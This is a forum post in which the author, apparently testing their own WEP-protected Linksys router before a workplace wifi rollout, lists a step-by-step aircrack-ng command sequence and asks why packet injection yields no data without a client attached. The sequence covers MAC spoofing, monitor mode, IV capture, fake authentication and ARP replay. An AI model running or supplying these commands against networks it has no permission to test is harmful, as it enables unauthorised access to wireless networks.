Hello

I'm trying to break a wireless password so that I may show my boss how easy (or not) it is to crack. He wants to set up a wifi spot here at work and I want to make sure all the security bases are covered.

I have a Linksys WRT54G ver. 1.1 wireless router with all settings default with the exception of WEP encryption turned on. MAC address filtering is not enabled. I have a desktop computer with an Asus WL-138GE wireless nic that has a Broadcom chipset. I am running Backtrack 4 pre Final from a live CD and I'm having a problem injecting IVs. These are the commands I'm running:

Code:
iwconfig
- This gives me low, eth0, wmaster0 and wlan0. I assume wlan0 is the interface I'm looking for.

Code:
airmon-ng stop wlan0
- Interface wlan0 with driver "b43 - [phy0]" is reporting monitor mode disabled.

Code:
macchanger --mac 00:02:B3:EC:EE:F2 wlan0
- Spoofs the MAC to an Intel corporation. I use this because I've read that some routers automatically reject MACs that are not real such as 00:11:22:33:44:55

Code:
airmon-ng start wlan0
- This enables monitor mode on mon0 which is my monitoring interface

Code:
airodump-ng mon0
- Gives me a list of all access points. My Linksys shows up here.

Code:
airodump-ng -c 6 -w linksys.out --bssid xx:xx:xx:xx:xx:xx mon0
- Starts dumping the IVs sent to that access point to linksys.out. xx:xx:xx:xx:xx:xx is of course the access point's MAC.

At this point I open a new konsole and leave the other one to log.

Code:
aireplay-ng -1 0 -a xx:xx:xx:xx:xx:xx -h 00:02:B3:EC:EE:F2 -e linksys wlan0
- Attempts to authenticate/associate with the router. I get the following message when this is run:
- Sending Authentication Request (Open system) [ACK]
- Authentication successful
- Sending Association Request [ACK]
- Association successful :-) (AID: 1)

Code:
aireplay-ng -3 -b xx:xx:xx:xx:xx:xx -h 00:02:B3:EC:EE:F2 wlan0
- This command should start injecting IVs and my #Data should be going up in my logging screen but it isn't. This is what I get:
- Read xxxx packets (got 0 ARP requests and 0 ACKs), sent 0 packets...(0 pps)

At this point I've read that this command could also work:

Code:
aireplay-ng -2 -p 0841 -c FF:FF:FF:FF:FF:FF -b xx:xx:xx:xx:xx:xx -h 00:02:B3:EC:EE:F2 wlan0
- It only says Read xxx packets and my #Data does not increase

If I attach another computer to the access point and start browsing the web my #Data goes up and I can crack the key but I want to break the password without a client attached. I thought maybe injection isn't working so I tried the following:

Code:
aireplay-ng -9 wlan0
- It tells me injection is working and found my Linksys. With the direct probe request it gave me 30/30 100% for my Linksys.

I've been searching and reading the replies on this board in an attempt to try to find a solution to this problem but I haven't come across anything that's helped me. If anyone has any suggestions please post away. Thanks.